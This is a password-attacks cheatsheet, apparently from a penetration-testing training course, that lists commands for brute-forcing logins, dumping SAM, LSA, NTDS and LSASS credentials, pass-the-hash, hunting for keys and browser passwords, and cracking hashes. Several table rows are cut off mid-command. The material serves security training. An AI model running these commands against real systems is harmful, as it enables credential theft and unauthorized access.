Password Attacks Cheatsheet
Password attacks are a pervasive threat in the digital landscape, often serving as the primary vector for cybercriminals to breach secure systems. In recent years, compromised credentials have been responsible for a significant majority of data breaches, with 81% of such incidents in 2020 attributed to weak or stolen passwords[1][2]. These attacks exploit vulnerabilities in user authentication, leveraging techniques such as phishing, man-in-the-middle attacks, brute force attempts, and credential stuffing to gain unauthorized access to sensitive information[1][2]. As technology advances, so too do the methods employed by hackers, making it increasingly important for individuals and organizations to implement robust security measures, including strong password policies and multi-factor authentication, to protect against these ever-evolving threats[5].
Connecting to Target
| Command | Description |
|---|---|
| xfreerdp /v: /u:htb-student /p:HTB_@cademy_stdnt! | CLI-based tool used to connect to a Windows target using the Remote Desktop Protocol. |
| evil-winrm -i -u user -p password | Uses Evil-WinRM to establish a Powershell session with a target. |
| ssh user@ | Uses SSH to connect to a target using a specified user. |
| smbclient -U user \\\SHARENAME | Uses smbclient to connect to an SMB share using a specified user. |
| python3 smbserver.py -smb2support CompData /home//Documents/ | Uses smbserver.py to create a share on a linux-based attack host. Can be useful when needing to transfer files from a target to an attack host. |
Password Mutations
| Command | Description |
|---|---|
| cewl https://www.inlanefreight.com -d 4 -m 6 –lowercase -w inlane.wordlist | Uses cewl to generate a wordlist based on keywords present on a website. |
| hashcat –force password.list -r custom.rule –stdout > mut_password.list | Uses Hashcat to generate a rule-based word list. |
| ./username-anarchy -i /path/to/listoffirstandlastnames.txt | Users username-anarchy tool in conjunction with a pre-made list of first and last names to generate a list of potential username. |
| curl -s https://fileinfo.com/filetypes/compressed | html2text |
Remote Password Attacks
| Command | Description |
|---|---|
| crackmapexec winrm -u user.list -p password.list | Uses CrackMapExec over WinRM to attempt to brute force user names and passwords specified hosted on a target. |
| crackmapexec smb -u “user” -p “password” –shares | Uses CrackMapExec to enumerate smb shares on a target using a specified set of credentials. |
| hydra -L user.list -P password.list :// | Uses Hydra in conjunction with a user list and password list to attempt to crack a password over the specified service. |
| hydra -l username -P password.list :// | Uses Hydra in conjunction with a username and password list to attempt to crack a password over the specified service. |
| hydra -L user.list -p password :// | Uses Hydra in conjunction with a user list and password to attempt to crack a password over the specified service. |
| hydra -C <user_pass.list> ssh:// | Uses Hydra in conjunction with a list of credentials to attempt to login to a target over the specified service. This can be used to attempt a credential stuffing attack. |
| crackmapexec smb –local-auth -u -p –sam | Uses CrackMapExec in conjunction with admin credentials to dump password hashes stored in SAM, over the network. |
| crackmapexec smb –local-auth -u -p –lsa | Uses CrackMapExec in conjunction with admin credentials to dump lsa secrets, over the network. It is possible to get clear-text credentials this way. |
| crackmapexec smb -u -p –ntds | Uses CrackMapExec in conjunction with admin credentials to dump hashes from the ntds file over a network. |
| evil-winrm -i -u Administrator -H “” | Uses Evil-WinRM to establish a Powershell session with a Windows target using a user and password hash. This is one type of Pass-The-Hash attack. |
Windows Local Password Attacks
| Command | Description |
|---|---|
| tasklist /svc | A command-line-based utility in Windows used to list running processes. |
| findstr /SIM /C:“password” *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml | Uses Windows command-line based utility findstr to search for the string “password” in many different file type. |
| Get-Process lsass | A Powershell cmdlet is used to display process information. Using this with the LSASS process can be helpful when attempting to dump LSASS process memory from the command line. |
| rundll32 C:\windows\system32\comsvcs.dll, MiniDump 672 C:\lsass.dmp full | Uses rundll32 in Windows to create a LSASS memory dump file. This file can then be transferred to an attack box to extract credentials. |
| pypykatz lsa minidump /path/to/lsassdumpfile | Uses Pypykatz to parse and attempt to extract credentials & password hashes from an LSASS process memory dump file. |
| reg.exe save hklm\sam C:\sam.save | Uses reg.exe in Windows to save a copy of a registry hive at a specified location on the file system. It can be used to make copies of any registry hive (i.e., hklm\sam, hklm\security, hklm\system). |
| move sam.save \\NameofFileShare | Uses move in Windows to transfer a file to a specified file share over the network. |
| python3 secretsdump.py -sam sam.save -security security.save -system system.save LOCAL | Uses Secretsdump.py to dump password hashes from the SAM database. |
| vssadmin CREATE SHADOW /For=C: | Uses Windows command line based tool vssadmin to create a volume shadow copy for C:. This can be used to make a copy of NTDS.dit safely. |
| cmd.exe /c copy \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit c:\NTDS\NTDS.dit | Uses Windows command line based tool copy to create a copy of NTDS.dit for a volume shadow copy of C:. |
Linux Local Password Attacks
| Command | Description |
|---|---|
| for l in $(echo “.conf .config .cnf”);do echo -e “\nFile extension: " $l; find / -name *$l 2>/dev/null | grep -v “lib |
| for i in $(find / -name *.cnf 2>/dev/null | grep -v “doc |
| for l in $(echo “.sql .db .db .db”);do echo -e “\nDB File extension: " $l; find / -name *$l 2>/dev/null | grep -v “doc |
| find /home/* -type f -name “.txt” -o ! -name “.*” | Uses Linux-based find command to search for text files. |
| for l in $(echo “.py .pyc .pl .go .jar .c .sh”);do echo -e “\nFile extension: " $l; find / -name *$l 2>/dev/null | grep -v “doc |
| for ext in $(echo “.xls .xls* .xltx .csv .od* .doc .doc* .pdf .pot .pot* .pp*”);do echo -e “\nFile extension: " $ext; find / -name *$ext 2>/dev/null | grep -v “lib |
| cat /etc/crontab | Uses Linux-based cat command to view the contents of crontab in search for credentials. |
| ls -la /etc/cron.*/ | Uses Linux-based ls -la command to list all files that start with cron contained in the etc directory. |
| grep -rnw “PRIVATE KEY” /* 2>/dev/null | grep “:1” |
| grep -rnw “PRIVATE KEY” /home/* 2>/dev/null | grep “:1” |
| grep -rnw “ssh-rsa” /home/* 2>/dev/null | grep “:1” |
| tail -n5 /home//.bash | Uses Linux-based tail command to search the through bash history files and output the last 5 lines. |
| python3 mimipenguin.py | Runs Mimipenguin.py using python3. |
| bash mimipenguin.sh | Runs Mimipenguin.sh using bash. |
| python2.7 lazagne.py all | Runs Lazagne.py with all modules using python2.7 |
| ls -l .mozilla/firefox/ | grep default |
| cat .mozilla/firefox/1bplpd86.default-release/logins.json | jq . |
| python3.9 firefox_decrypt.py | Runs Firefox_decrypt.py to decrypt any encrypted credentials stored by Firefox. Program will run using python3.9. |
| python3 lazagne.py browsers | Runs Lazagne.py browsers module using Python 3. |
Cracking Passwords
| Command | Description |
|---|---|
| hashcat -m 1000 dumpedhashes.txt /usr/share/wordlists/rockyou.txt | Uses Hashcat to crack NTLM hashes using a specified wordlist. |
| hashcat -m 1000 64f12cddaa88057e06a81b54e73b949b /usr/share/wordlists/rockyou.txt –show | Uses Hashcat to attempt to crack a single NTLM hash and display the results in the terminal output. |
| unshadow /tmp/passwd.bak /tmp/shadow.bak > /tmp/unshadowed.hashes | Uses unshadow to combine data from passwd.bak and shadow.bk into one single file to prepare for cracking. |
| hashcat -m 1800 -a 0 /tmp/unshadowed.hashes rockyou.txt -o /tmp/unshadowed.cracked | Uses Hashcat in conjunction with a wordlist to crack the unshadowed hashes and outputs the cracked hashes to a file called unshadowed.cracked. |
| hashcat -m 500 -a 0 md5-hashes.list rockyou.txt | Uses Hashcat in conjunction with a word list to crack the md5 hashes in the md5-hashes.list file. |
| hashcat -m 22100 backup.hash /opt/useful/seclists/Passwords/Leaked-Databases/rockyou.txt -o backup.cracked | Uses Hashcat to crack the extracted BitLocker hashes using a wordlist and outputs the cracked hashes into a file called backup.cracked. |
| ssh2john.pl SSH.private > ssh.hash | Runs Ssh2john.pl script to generate hashes for the SSH keys in the SSH.private file, then redirects the hashes to a file called ssh.hash. |
| john ssh.hash –show | Uses John to attempt to crack the hashes in the ssh.hash file, then outputs the results in the terminal. |
| office2john.py Protected.docx > protected-docx.hash | Runs Office2john.py against a protected .docx file and converts it to a hash stored in a file called protected-docx.hash. |
| john –wordlist=rockyou.txt protected-docx.hash | Uses John in conjunction with the wordlist rockyou.txt to crack the hash protected-docx.hash. |
| pdf2john.pl PDF.pdf > pdf.hash | Runs Pdf2john.pl script to convert a pdf file to a pdf has to be cracked. |
| john –wordlist=rockyou.txt pdf.hash | Runs John in conjunction with a wordlist to crack a pdf hash. |
| zip2john ZIP.zip > zip.hash | Runs Zip2john against a zip file to generate a hash, then adds that hash to a file called zip.hash. |
| john –wordlist=rockyou.txt zip.hash | Uses John in conjunction with a wordlist to crack the hashes contained in zip.hash. |
| bitlocker2john -i Backup.vhd > backup.hashes | Uses Bitlocker2john script to extract hashes from a VHD file and directs the output to a file called backup.hashes. |
| file GZIP.gzip | Uses the Linux-based file tool to gather file format information. |
| for i in $(cat rockyou.txt);do openssl enc -aes-256-cbc -d -in GZIP.gzip -k $i 2>/dev/null | tar xz;done |
Hydra
| Command | Description |
|---|---|
| hydra -h | hydra help |
| hydra -C wordlist.txt SERVER_IP -s PORT http-get / | Basic Auth Brute Force - Combined Wordlist |
| hydra -L wordlist.txt -P wordlist.txt -u -f SERVER_IP -s PORT http-get / | Basic Auth Brute Force - User/Pass Wordlists |
| hydra -l admin -P wordlist.txt -f SERVER_IP -s PORT http-post-form “/login.php:username=^USER^&password=^PASS^:F=<form name=‘login’” | Login Form Brute Force - Static User, Pass Wordlist |
| hydra -L bill.txt -P william.txt -u -f ssh://SERVER_IP:PORT -t 4 | SSH Brute Force - User/Pass Wordlists |
| hydra -l m.gates -P rockyou-10.txt ftp://127.0.0.1 | FTP Brute Force - Static User, Pass Wordlist |
Wordlists
| Command | Description |
|---|---|
| /opt/useful/SecLists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt | Default Passwords Wordlist |
| /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt | Common Passwords Wordlist |
| /opt/useful/SecLists/Usernames/Names/names.txt | Common Names Wordlist |
Misc
| Command | Description |
|---|---|
| cupp -i | Creating Custom Password Wordlist |
| sed -ri ‘/^.{,7}$/d’ william.txt | Remove Passwords Shorter Than 8 |
| sed -ri ‘/[!-/:-@[-`{-~]+/!d’ william.txt | Remove Passwords With No Special Chars |
| sed -ri ‘/[0-9]+/!d’ william.txt | Remove Passwords With No Numbers |
| ./username-anarchy Bill Gates > bill.txt | Generate Usernames List |
| ssh b.gates@SERVER_IP -p PORT | SSH to Server |
| ftp 127.0.0.1 | FTP to Server |
| su - user | Switch to User |